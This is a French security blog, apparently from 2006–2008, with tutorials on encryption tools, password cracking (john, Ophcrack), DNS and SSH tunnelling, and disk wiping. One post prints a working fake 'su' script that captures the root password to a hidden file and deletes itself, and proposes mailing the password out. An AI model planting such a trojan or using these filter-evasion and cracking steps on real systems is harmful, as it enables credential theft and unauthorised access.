Yop - Sécu

TrueCrypt en version 6.0

Yannick — Tue, 08 Jul 2008 01:45:00 +0200

Tout le monde connait le logiciel de chiffrement TrueCrypt, mais tout le monde ne sait pas encore que la version 6.0 est sortie:)

Téléchargement
Historique des versions

Bon.. j'accède toujours à mes données...c'est déjà çà :)

PS: Si un lecteur a des billes sur qui est derrière la TrueCrypt Foundation... Il peux poster un commentaire ou me contacter...

shc - Generic shell script compiler

Yannick — Fri, 02 May 2008 01:15:00 +0200

En gros, shc permet de compiler un script shell...et donc d'obtenir un binaire executable (portable avec l'option -r).
L'avantage principal, c'est surtout qu'il devient plus difficile de "voir" le contenu du script...Cela permet de décourager ou de ralentir les curieux...
On peut donc l'utiliser par example pour compliquer la lecture des scripts qui contiennent des mots de passe...

/!\ Il doit être possible avec des debuggers ou des "ps" etc... d'obtenir le code source.. voir même peut être de déterminer la clé de chiffrement...mais disons que c'est toujours un peu mieux que le pass complètement en clair dans le .sh quand il n'y a vraiment pas le choix et que ce n'est pas pour protéger le lançement de missiles nucléaires...

$ sudo apt-get install shc
$ cat toto.sh
#!/bin/sh
echo ataatatataat
$ shc -r -f toto.sh
$ ls |grep toto
toto.sh
toto.sh.x
toto.sh.x.c
$ ./toto.sh.x
ataatatataat
$ strings toto.sh.x | grep ataa
$

Plus d'infos sur les limites ici et là.

Si quelqu'un a fait des tests de sécurité sur la version 3.8.6... ?

Trouver les sites web d'une IP

Yannick — Sat, 22 Mar 2008 15:29:00 +0100

Il n'y a pas de véritable moyens DNS pour déterminer les noms de domaines pointant vers une IP

Le PTR ne donne pas ce que l'on recherche...
Les transferts de zones sont heureusement souvent non authorisés et ne donneraient pas tous les résultats (mais que ceux du serveur DNS en question)
La brute force..on oublie..

Bref.. Il reste l'indexation faite par les moteurs de recherche...

www.live.com permet de faire ce type de recherche en utilisant la syntaxe:

ip:194.109.137.218

Des sites comme www.myipneighbors.com permet également de faire la même chose.. Ce site ne semble pas tirer ses résultats de www.live.com... ? A t'il ses propres robots de recherche ?

Extensions Firefox Exploit-Me

Yannick — Tue, 27 Nov 2007 23:55:00 +0100

Sortie ce matin des nouvelles extensions Exploit-Me:

On va regarder cela...

Chiffre de Vigenère

Yannick — Mon, 23 Jul 2007 21:14:00 +0200

La théorie

Le Chiffre de Vigenère est un système de chiffrement, publié en 1586 par Blaise de Vigenère.

Ce système de chiffrement fût une petite révolution et resta "incassable" jusqu'en 1854, année où Charles Babbage en réussit la cryptannalyse.
Les travaux de Babbage restèrent secret jusqu'au XXème siècle (en effet il travaillait pour le roi... donc on imagine l'intérêt à ne rien révéler), mais la cryptannalyse avait été également réussie et publiée par Friedrich Wilhem Kasinski en 1863.

Je laisse le lecteur allez lire comment fonctionne le chifffrement et sa cryptannalyse.

La pratique - Chiffrer/Déchiffrer

Un des moyens est d'utiliser gcipher qui est utilisable aussi bien en ligne de commande qu'en interface graphique.

sudo apt-get install gcipher

$ gcipher -c Vigenere -k linux
yes yes yo yo
jmf sbd gb sl
$
$ echo jmf sbd gb sl | gcipher -C Vigenere -k linux
yes yes yo yo
$

On peut constater que la "force" du chiffre de Vigenère est qu'une même lettre du texte en clair n'est pas chiffrée par la même lettre.

La pratique - Décrypter

Simon Liu à écrit une petite librairie python pour décrypter un texte chiffré en Vigenère. Il est préférable de "deviner" en quelle langue le texte est écrit, et de disposer d'un texte suffisament long pour fournir les répétitions nécessaires...

$ cd /usr/include/python2.5/
$ sudo wget http://smurfoncrack.com/pygenere/pygenere.py
$ python
>>> from pygenere import *

On insert la chaine chiffrée:

>>> encrypted = 'Yfi. 1cf Acg wmabcg cywhqscr si bsbcigcbi jwqpsh ch teojv sc bfdghh.[suite tronquée]

On demande à décrypter le texte (on ne connait pas la clé):

>>> print VigCrack(encrypted).set_language('FR').crack_message()
Art. 1er Les hommes naissent et demeurent libres et egaux en droits.[suite tronquée]

Si on veut afficher la clé:

>>> print VigCrack(encrypted).set_language('FR').crack_codeword()
YOPYOP
>>> print VigCrack(encrypted).set_language('FR').crack_codeword(3)
YOP
>>>

A noter:
- J'ai utilisé dans l'exemple ci-dessus uniquement les 2 premiers articles (4 phrases).

- Même sans préciser la langue (et avec le texte de l'exemple), le texte est correctement décrypté.

- Avec un texte trop court (uniquement le premier article) nous obtenons tout de même:

Led romnes natcseot et dpweusent ltlret et eglex eo droiec.

Conclusion

We Esmqftp hp Vkriyetp rp pgfx oopn tls upvgit oi you usfru asfr esmqftpv oeu xidscrid mctw di kw e eowe hp mgxi ceutwee rcid dg 3 dmpcnpw pt npw ceesiccjpw oe epw 3 nraaxzgtltseu aifvgyx pttp wllwpid :) Mgcgt d cgstr hlme l gqjzrv oi oeeccatgc pl cqygwuutsy dg nie atemnlg ;)

Mot de passe pour GNU Screen

Yannick — Tue, 12 Jun 2007 22:27:00 +0200

On peut utiliser un mot de passe pour "protéger" l'accès à un Screen. (Par exemple dans l'utilisation d'un serveur maintenu par plusieurs administrateurs...)
La procédure est la suivante:

A l'intérieur d'un screen:

Ctrl+a :password

New screen password:
Retype new password:
[ Password moved into copybuffer ]

Maintenant, on "détache", et en "réattachant," le mot de passe sera demandé.

Si on veut avoir toujours le même mot de passe (même pour les futures sessions qui n'existent pas encore), il suffit de placer le mot de passe chiffré dans le .screenrc du user.

Pour afficher le mot de passe chiffré:

Ctrl+a :password

New screen password:
Retype new password:
[ Password moved into copybuffer ]

Ctrl+a ]

Exemple de .screenrc:

password MNp4qLZor0YJw

Par contre c'est la fonction crypt() qui est utilisée ...donc attention au mot de passe...

$ time john -format:DES file
Loaded 1 password (Standard DES [48/64 4K])
toto (user)
guesses: 1 time: 0:00:00:01 (3) c/s: 148654 trying: timp2 - maga

real 0m1.158s
user 0m1.068s
sys 0m0.020s
$

dns2tcp - Encapsulation dans des requêtes DNS

Yannick — Thu, 15 Mar 2007 00:34:00 +0100

Introduction

dns2tcp est un outils permettant d'encapsuler du trafic dans des requêtes DNS.

La partie serveur simule un serveur DNS (donc doit écouter sur le port 53) et est par exemple à installer sur sa ligne Adsl perso. Le client encapsule les données dans des requêtes DNS qui sont envoyées au serveur interne spécifié. Ce serveur DNS qui lui à le plus souvent accès au port 53 vers Internet (ou en tous cas de résoudre des domaines externes), transmet à notre faux serveur DNS les données qui sont ensuite décapsulées. Le retour des paquets ce fait de la même manière.

Coté DNS

Il est nécessaire d'ajouter une entrée dans les DNS exemple:

dns2tcp.example.org NS 1.2.3.4

C'est en essayant de résoudre des sous domaines de ce nom que les paquets arriveront jusqu'au faux serveur DNS.

Coté serveur

cat /etc/dns2tcpd.conf
listen = 0.0.0.0
port = 53
user=nobody
chroot = /var/empty/dns2tcp/
domain = dns2tcp.example.org
ressources = sshYop:127.0.0.1:22

Ici nous indiquons qu'une connexion vers le port 22 du même serveur sera accessible sous le nom arbitraire sshYop

Lancement du server (ici en mode debug...)

sudo dns2tcpd -F -d 1 -f /etc/dns2tcpd.conf

Coté client

Lister les "connexions disponibles"

dns2tcpc -z dns2tcp.example.org 192.168.1.1

Les paramètres étant le nom de domaine et le serveur DNS accessible (dans l'exemple 192.168.1.1).

La réponse doit être:

Available connection(s) :
sshYop

Pour monter la connexion "DNS":

dns2tcpc -c -r sshYop -l 4430 -z dns2tcp.example.org 192.168.1.1

Les paquets envoyés vers le port 4430 local seront donc envoyés dans l'exemple au port 22 de la machine dns2tcp.example.org (mais tout ceci uniquement avec des requêtes DNS).

Pour monter la connexion SSH:

ssh -p 4430 127.0.0.1

Du browsing est par exemple possible avec la partie Socks de Ssh:

ssh -D 3333 -p 4430 127.0.0.1

Résumé en image

Conclusion

Ce programme permet donc d'accéder à Internet quand on a seulement le droit d'accéder à un serveur DNS "interne".
Les "voyageurs" verront tout de suite l'utilité ;)

Merci Modu ;)

DBAN - Pour effacer de manière sécurisée un disque dur

Yannick — Mon, 12 Feb 2007 12:33:00 +0100

J'avais besoin d'effacer le manière "sécurisée" tout un disque dur... Qui dit disque entier, dit utilisation d'autre chose qu'un "shred" ou un "wipe" qui sont plutôt orientés effacement de fichiers.

Le temps de trouver un "vrai" soft, j'ai lançé un simple "dd" depuis un LiveCD:

dd if=/dev/zero of=/dev/hda

Cela à pris 14 minutes (disque de 20 Go) ce qui m'a laissé le temps de trouver la solution qui semble être la plus "reconnue", j'ai nommé DBAN

DBAN se présente sous la forme d'un media bootable (CD par exemple), on boot dessus, il trouve le ou les disques durs puis les "efface" de manière sécurisée...

On ne peut jamais être sûr à 100% que des données ne seront pas récupérables, mais cela semble être une des solutions les plus sûres en dehors d'une destruction physique.

Q: Are you absolutely sure that DBAN works properly?
A: No.
[...]DBAN is "good enough" for "most people".

Plusieurs "normes" d'effacement sont possibles:
- Canadian RCMP TSSIT OPS-II Standard Wipe
- American DoD 5220-22.M Standard Wipe
- Gutmann Wipe
- PRNG Stream Wipe

Screenshot du site officiel:

Compter environ 1heure pour un disque de 20Go avec l'option par défaut "Autonuke" (3 passes).

Schneier

Yannick — Sun, 22 Oct 2006 01:24:59 +0000

Les choses que vous ne saviez pas sur Bruce Schneier :)

- Bruce Schneier's mail server only sends him the emails' hashes, just to make things a little more interesting for him.
- Bruce Schneier can decrypt your PKI message with the public key.
- Bruce Schneier knows Alice and Bob's shared secret.
- Setting SSID of an open Wi-Fi network to "bruceschneier" makes it completely secure.
...

Vidéo BlackHat et sécurité Wifi

Yannick — Tue, 26 Sep 2006 14:01:01 +0000

Voici un bref résumé de la saga de l'été...

August 2-3

Video présentée à BlackHat par David Maynor et Johnny Cache
Les slides
La video

August 18, 2006

Apple indique que les auteurs de la vidéo ne leur ont pas donné de preuves de problème

Friday, 1 September 2006

La véracité de la video est très contreversée un peu partout...
Exemple:
An Open Challenge to David Maynor and Jon Ellch
et sur son blog

Sun Sep 3 14:37:48 EST 2006

Quelques éclaicissements de Johnny Cache (sur son silence et ses compétences)

September 19, 2006

Coïncidence, plein de patchs Apple..
Security content of AirPort Update 2006-001 and Security Update 2006-005

2006-09-19

Coïncidence, le même jour, de nouvelles infos de David Maynor..
Beginner's guide to wireless auditing by David Maynor

2006-09-21

Apple dément le lien entre les auteurs de la video, et leurs patchs.
Apple wireless vulnerable after all

A suivre...

Dans tous les cas, un gros coup de pub pour Secureworks qui est:
Named to "the Inc. 500 List of Fastest Growing Private Companies for Second Year Running" :)

Présentations Black Hat USA 2006

Yannick — Thu, 10 Aug 2006 22:44:30 +0000

mkdir bh2006 && cd bh2006 && for i in `wget -O - -q http://164.106.251.250/docs/bh2006/ |grep pdf |cut -d= -f4|cut -d\> -f1 |cut -d\" -f2` ; do wget http://164.106.251.250/docs/bh2006/$i; done

Comparatif de réactivité de sortie des correctifs de différentes distributions Linux

Yannick — Sat, 05 Aug 2006 00:58:42 +0000

Cet article présente un classement des distributions les plus rapides à sortir les correctifs de sécurité, en attribuant des notes de réactivité sur une trentaine de failles sorties ces 6 derniers mois...

1- Ubuntu
2- Fedora Core
3- RedHat EL
4- Debian
....

A noter que certaines distribs veulent peut être vérifier plus attentivement la vulnérabilité et/ou le correctif avant de le releaser...

Via The Fridge

Video SSTIC 2006 de nikoteen

Yannick — Thu, 15 Jun 2006 00:33:25 +0000

Je n'ai pas de catégorie humour alors je le met en "Sécu"

Extrait SSTIC 2006 - Réalisé par nikoteen - (Qualité appareil photo)

http://zetetique.info/sstic06-nikoteen.avi
ou mirroir sur:
http://sid.rstack.org/videos/confs/0506_SSTIC_Nikoteen.avi

...trop bon... :)

Chiffrer en symétrique avec gpg

Yannick — Sun, 28 May 2006 03:12:15 +0000

Introduction

J'ai régulièrement besoin d'envoyer des fichiers chiffrés à des correspondants qui répondent aux critères suivant:
- Ils sont sous Windows
- Ils sont "néophites" et il n'est pas question d'essayer de leur faire générer (en plus de l'installation d'un logiciel) des bi-clés asymétriques.

Cela requiert l'utilisation d'un logiciel qui:
-soit gratuit (et facilement installable)
-puisse être utilisé sur (mon) Linux pour chiffrer le fichier, et sur leur Windows pour le déchiffrer
-puisse chiffrer/déchiffrer en symétrique pour simplifier au maximum la procédure.

Pour cela on peut utiliser gpg (avec l'option -c pour chiffrer en symétrique)

gpg -- encryption and signing tool

-c, --symmetric
Encrypt with a symmetric cipher using a passphrase.

Exemple de chiffrement

[yannick@yop /tmp] echo totootototot > toto
[yannick@yop /tmp] gpg -c --cipher-algo=AES256 toto
Enter passphrase:
Repeat passphrase:
[yannick@yop /tmp] ls toto*
toto toto.gpg
[yannick@yop /tmp]
[yannick@yop /tmp] rm toto
[yannick@yop /tmp] cat toto.gpg
è¼÷-$+q`Ò?ëfW³¿1ð. Ð[<ï c<
æ$ïÉÈßN(^·®?ÙYÏ·°èáì=v/ûwc4#Ð-F!}|Tó[yannick@yop /tmp]

Exemple de déchiffrement sous linux

[yannick@yop /tmp] gpg toto.gpg
gpg: AES256 encrypted data
Enter passphrase:
gpg: encrypted with 1 passphrase
[yannick@yop /tmp]
[yannick@yop /tmp] ls toto*
toto toto.gpg
[yannick@yop /tmp] cat toto
totootototot
[yannick@yop /tmp]

Exemple de déchiffrement sous Windows

À l'écriture de ce billet, la dernière version de binaire Windows est ici:
ftp://ftp.gnupg.org/gcrypt/binary/gnupg-w32cli-1.4.3.exe

Microsoft Windows XP [version 1.2.3400]
(C) Copyright 1785-2032 Microsoft Corp.

C:\Documents and Settings\Administrateur>more c:\toto.gpg
???Þ?+¸-$+q`Ê??ÙfÜW¦+?1.áð[<´ c<?µ$´++¯N(^À«?+Y¤éÀ?¦Þßý=v/¹wc4#ð-òF!ò}ì|T¾

C:\Documents and Settings\Administrateur>
C:\Documents and Settings\Administrateur>gpg c:\toto.gpg
gpg: AES256 encrypted data
Enter passphrase:
gpg: encrypted with 1 passphrase

C:\Documents and Settings\Administrateur>
C:\Documents and Settings\Administrateur>dir c:\toto*
Le volume dans le lecteur C n'a pas de nom.
Le numéro de série du volume est 1234-1234
Répertoire de c:\

28/05/2006 02:58 80 toto.gpg
28/05/2006 03:20 13 toto
2 fichier(s) 93 octets
0 Rép(s) 7 583 334 400 octets libres
C:\Documents and Settings\Administrateur>
C:\Documents and Settings\Administrateur>more c:\toto
totootototot

C:\Documents and Settings\Administrateur>

Installation sous Windows

C'est du "Next, Next, Finish", mais on peut toujour envoyer un petit pdf explicatif au correspondant pour l'aider...

A faire

Il pourrait être sympa d'avoir un script (script nautilus pas exemple) qui chiffre un fichier et qui le met automatiquement dans un zip auto-extractible qui contient déja gpg.exe et qui lançe automatiquement un .bat qui cherche à déchiffrer le fichier en question... ce qui ferait que le destinataire n'aurait même pas a installer gpg....
Si ça interresse une une bonne âme (parceque j'ai pas trouvé pour Linux?) ;)

Final Release - BackTrack v.1.0 is available

Yannick — Sat, 27 May 2006 01:43:50 +0000

Backtrack désormais en version "v.1.0 Final"...

http://www.remote-exploit.org/index.php/BackTrack_Downloads

Mon précédent billet

Chiffrer ses données avec EncFS

Yannick — Wed, 17 May 2006 12:07:47 +0000

Introduction

EncFS permet de chiffrer très simplement des données.
En gros, 2 répertoires sont utilisés:
- le répertoire dans lequel sont stoquées les données chiffrées.
- le répertoire dans lequel on monte les données en clair pour y accéder.

Installation

sudo apt-get install encfs fuse-utils

Charger tout de suite le module fuse avec:

sudo modprobe fuse

Activer le chargement au démarrage en ajoutant fuse dans le fichier /etc/modules

Ajouter l'utilisateur au groupe fuse avec:

sudo adduser <NomUser> fuse

puis réouvrir une session avec

su - <user>

Vérification par la commande

groups

Initialisation

encfs /home/yannick/.crypt/ /home/yannick/crypt/

Cette commande permet la 1ère fois qu'elle est lancée de tout paramétrer pour stoquer les données chiffrées dans le répertoire .crypt/ et de monter les données en clair dans le répertoire crypt/ ...Tout ceci avec le mot de passe demandé, et avec l'algo choisi:
A noter qu'il est nécessaire d'indiquer des chemins complets !

[yannick@yop ~] encfs /home/yannick/.crypt/ /home/yannick/crypt
The directory "/home/yannick/.crypt/" does not exist. Should it be created? (y,n) y
The directory "/home/yannick/crypt" does not exist. Should it be created? (y,n) y
Création d'un nouveau volume chiffré.
Veuillez choisir au moins une des options suivantes :
entrez "x" pour le mode de configuration expert,
entrez "p" pour un mode pré-configuré paranoïaque,
n'importe quoi d'autre ou une ligne vide sélectionnera le mode standard.
?> p

Configuration paranoïaque sélectionnée.

Configuration terminée. Le système de fichiers sur le
point d'être créé a les caractéristiques suivantes :
Chiffrement de système de fichiers "ssl/aes", version 2:1:1
Encodage du nom de fichier : "nameio/block", version 3:0:1
Taille de clé : 256 bits
Taille de bloc : 512 octets, y compris 8 octets d'en-tête MAC
Chaque fichier comprend un en-tête de 8 octets avec des données IV uniques.
Nom de fichiers chiffrés en utilisant le mode de chaînage IV.
L'IV des données du fichier est chaînée à l'IV du nom de fichier.

Vous allez maintenant devoir entrer un mot de passe
pour votre système de fichiers.
Vous allez devoir absolument vous souvenir de ce mot de passe,
comme il n'y a aucun mécanisme de secours.
Cependant, le mot de passe pourra être changé plus tard
en utilisant encfsctl.

Nouveau mot de passe EncFS:
Vérifiez le mot de passe EncFS:
[yannick@yop ~]

Utilisation

Pour ne plus pouvoir accéder au données en clair, il suffit de démonter le répertoire:

fusermount -u /home/yannick/crypt

Pour accéder au données en clair, il suffit de réutiliser la même commande qu'au début.
(Maintenant EncFS voit qu'une initialisation a déja été faite sur ces répertoires et ne redemande plus de choisir un nouveau mot de passe ou de choix d'algo)
(Il demande simplement le mot de passe choisi à l'étape précédente).

encfs /home/yannick/.crypt/ /home/yannick/crypt/

Toute donnée copiée (en clair donc) dans le répertoire crypt/ sera automatiquement stoquée chiffrée dans .crypt/

Exemple

[yannick@yop ~] echo tutu > crypt/toto

[yannick@yop ~] ll crypt
total 20K
drwx------ 2 yannick yannick 4,0K 2006-05-15 17:39 .
drwxr-xr-x 154 yannick yannick 8,0K 2006-05-15 17:02 ..
-rw-r--r-- 1 yannick yannick 5 2006-05-15 17:39 toto
[yannick@yop ~]
[yannick@yop ~] ll .crypt/
total 24K
drwx------ 2 yannick yannick 4,0K 2006-05-15 17:39 .
drwxr-xr-x 154 yannick yannick 8,0K 2006-05-15 17:02 ..
-rw-r----- 1 yannick yannick 239 2006-05-15 17:01 .encfs5
-rw-r--r-- 1 yannick yannick 21 2006-05-15 17:39 kFt9KLjUCdpWHJfyabKjfD0k

[yannick@yop ~] cat .crypt/kFt9KLjUCdpWHJfyabKjfD0k
i¥Æ1ýúð
ã?DmDNò7ó[yannick@yop ~]
[yannick@yop ~]
[yannick@yop ~] fusermount -u crypt
[yannick@yop ~] ll crypt
total 16K
drwx------ 2 yannick yannick 4,0K 2006-05-15 17:00 .
drwxr-xr-x 154 yannick yannick 8,0K 2006-05-15 17:02 ..
[yannick@yop ~]

Conclusion/Divers

Il existe beaucoup d'autres méthodes pour chiffrer les données sous Linux, mais celle ci a, je trouve, le plus d'avantages.

Cette méthode ne nécessite pas par exemple, de créer un fichier d'une taille définie dédiée à l'espace chiffré...par contre on peut voir le nombre de fichiers chiffrés , leur taille, leurs droits ... ceci étant un avantage lors de l'utilisation de backups incrémentaux par exemple...

Les performances semblent correctes (crontrairement à d'autres solutions)..
J'ai fait un test de lecture de divx par exemple... je n'ai noté aucun ralentissement...

Dans le cas ou le module fuse n'est pas trouvé au moment du chargement, il se peut qu'il faille modifier le noyau (cas de ma sarge en 2.4).
Dans ce cas faire un:

sudo apt-get install module-assistant
sudo module-assistant...

puis "prepare", puis "select", puis "fuse", puis "build", puis faire "enter" au moment du "The source package may not be installed...", puis "exit...
...et la le "modprobe fuse" devrait être ok...

Ne pas hésiter à utiliser des alias pour simplifier le montage et le démontage...

Pour pouvoir accéder au données en clair, est nécessaire en plus du mot de passe de bien avoir le fichier .encfs5 à la racine du répertoire chiffré...

Cette autre page est interressante à lire en plus du man...

Bref... une installation en 3/4 commandes, une utilisation en 2 commandes... çà serait vraiment dommage de ne pas en profiter surtout sur un PC portable où les données sont particulièrement exposées...

PS: Suite à un commentaire de Totologie, il est a noter que les liens (hard) ne peuvent pas etre copiés dans le répertoire chiffré en mode "paranoiaque". (Pour plus d'infos, voir les commentaires)

EDIT: Ajout de ce billet sur le Wiki d'Ubuntu-fr

tsock - pour tout rendre compatible Socks !

Yannick — Sat, 22 Apr 2006 16:07:14 +0000

Introduction

tsocks permet en gros, de faire passer par un proxy Socks, des applications qui nativement ne le permettent pas. Il permet donc, par exemple, de faire passer une appli par le proxy Socks d'OpenSSH et donc de chiffrer les données...(voir billet précédent).

tsocks' role is to allow these non SOCKS aware applications (e.g telnet, ssh, ftp etc) to use SOCKS without any modification. It does this by intercepting the calls that applications make to establish network connections and negotating them through a SOCKS server as necessary.

Installation

Sous Debian/Ubuntu un simple:

sudo apt-get install tsocks

Les fichiers principaux:

Le fichier de conf /etc/tsocks.conf
Le binaire /usr/bin/tsocks
La librairie /usr/lib/libtsocks.so

Configuration:

Modifier le fichier /etc/tsocks.conf
Il permet d'indiquer:
-les réseaux qui accéderont sans proxy Socks
-les proxy socks à utiliser en fonctions des réseaux à accéder
-le proxy socks par défaut

Dans le cas d'utilisation d'un proxy Socks lancé localement par OpenSSH sur le port 1234, la configuration de tsocks sera du type:
server = 127.0.0.1
server_port = 1234
server_type = 5

Utilisation

- Soit on envoi directement toutes les applis lançées dans ce shell vers tsocks (et donc à travers le tunnel SSH dans notre cas) avec:

source tsocks -on
source tsocks -off

On peut voir si la librairie est chargée avec:
[yannick@yop ~] env |grep LD_PRELOAD
ou
[yannick@yop ~] source tsocks -show
LD_PRELOAD="/usr/lib/libtsocks.so"

- Soit on envoit les applis "une par une" vers tsocks (et donc le tunnel OpenSSH) avec:

tsocks <NomAppli>

exemples:

[yannick@yop ~] tsocks liferea &

On peut vérifier avec quelquechose comme:

[yannick@yop ~] wget -O - -q http://www.whatismyip.org
1.1.1.1
[yannick@yop ~] tsocks wget -O - -q http://www.whatismyip.org
2.2.2.2
[yannick@yop ~]

Conclusion:

Ce type de connexion (appli -> [tsocks -> OpenSSH]-> ressource ) peut permettre aussi bien de "sortir" d'un réseau "non sûr" (Accès Wifi...)en passant par son Pc perso par exemple, que d'accéder de l'extérieur aux ressources "internes" d'un réseau d'entreprise...

Tunnel SSH avec l'option -D

Yannick — Sat, 22 Apr 2006 15:42:00 +0000

Ce billet présente l'utilisation de l'option -D de la commande ssh.
Pour illustrer cette option, prenons le cas ou vous êtes dans un réseau "non sûr" et que vous voulez surfez sans que le réseau dans lequel vous êtes puisse trop vous surveiller...
Prérequis: vous avez une machine chez vous en adsl sur laquelle écoute un serveur SSH (de préférence sur le port 80 ou 443 dans notre exemple) mais sur laquelle il n'y a pas besoin d'avoir un Squid ou autre...
Il suffit alors de monter un tunnel SSH vers le serveur à la maison (même à travers un proxy Http) et de surfer à l'intérieur du tunnel pour sortir réellement sur le net par la ligne de la maison...

-D port
Specifies a local "dynamic" application-level port forwarding. This works by allocating a socket to listen to port on the local side, and whenever a connection is made to this port, the connection is forwarded over the secure channel, and the application protocol is then used to determine where to connect to from the remote machine. Currently the SOCKS4 and SOCKS5 protocols are supported,[...]

Le petit dessin illustrant la communication de l'exemple ci-dessous:

On lançe sur la machine client la commande SSH:

ssh -D 1111 -p 443 login@srvMaison

Il suffit ensuite de configurer notre client Http (Firefox) pour utiliser un proxy Socks sur le serveur 127.0.0.1 sur le port 1111

Fin:

Nous surfons donc sans que le réseau dans lequel nous sommes ne puisse voir les sites où nous allons...
...et ceci sans utiliser rien d'autre qu'un serveur SSH "perso"...

La même chose en graphique avec putty:

Et les autres applis ne pouvant pas être configurées pour utiliser un proxy SOCKS ?

ahhhh... eh bien c'est possible aussi... et c'est l'objet du billet suivant :)

PS: Attention à la confidentialité des requètes DNS qui ne passent pas dans le tunnel...

Jouons avec ''su''

Yannick — Fri, 14 Apr 2006 12:45:55 +0000

Un vrai su si on se trompe de mot de passe:

[yannick@yop /tmp] su
Password:
su : Authentication failure
Désolé.
[yannick@yop /tmp]

Un su un peu modifié qui serait susceptible de remplacer le vrai:

[yannick@yop /tmp] cat badsu
#!/bin/sh
echo -n "Password: "
stty -echo
read pw
echo ""
echo $pw > /tmp/.pw 2>/dev/null
stty echo
echo "su: Authentication failure"
echo "Désolé."
rm badsu
[yannick@yop /tmp]

[yannick@yop /tmp] ./badsu
Password:
su: Authentication failure
Désolé.
[yannick@yop /tmp]

[yannick@yop /tmp] cat /tmp/.pw
aaaaaabbbbb
[yannick@yop /tmp]

Après c'est sûr qu'il faut avoir été root au moins pendant 1 minute pour remplacer l'original...
...mais c'est pas parcequ'on est root qu'on connait forcément le mot de passe...
On peut améliorer le script pour envoyer un mail... ou pour lancer le vrai su avec le mot de passe.. etc..

Retrouver des mots de passe Windows en quelques secondes - Ophcrack

Yannick — Thu, 13 Apr 2006 15:48:09 +0000

Je viens de tester le LiveCD de http://ophcrack.sourceforge.net/

Son avantage sur L0phtCrack, c'est la rapidité. (Utilisation de rainbow tables)...
Son avantage sur The Offline NT Password Editor, c'est qu'il retrouve le mot de passe au lieu de juste le remplacer...

On boote dessus, et sans rien faire, il trouve la partition Windows et la SAM, charge les tables, et commence les comparaisons...

Je viens de tester sur un XP avec un mot de passe (qui n'est pas un mot du dictionnaire) composé de:
3 majuscules
2 minuscules
3 chiffres

...il a trouvé en 2 minutes environ sur une machine à 2,8 Ghz...

J'ai essayé en mettant un caractère spécial et il n'a pas trouvé la partie qui contenanait ce caractère.
Il semble qu'on puisse acheter une version pour avoir les caractères spéciaux etc..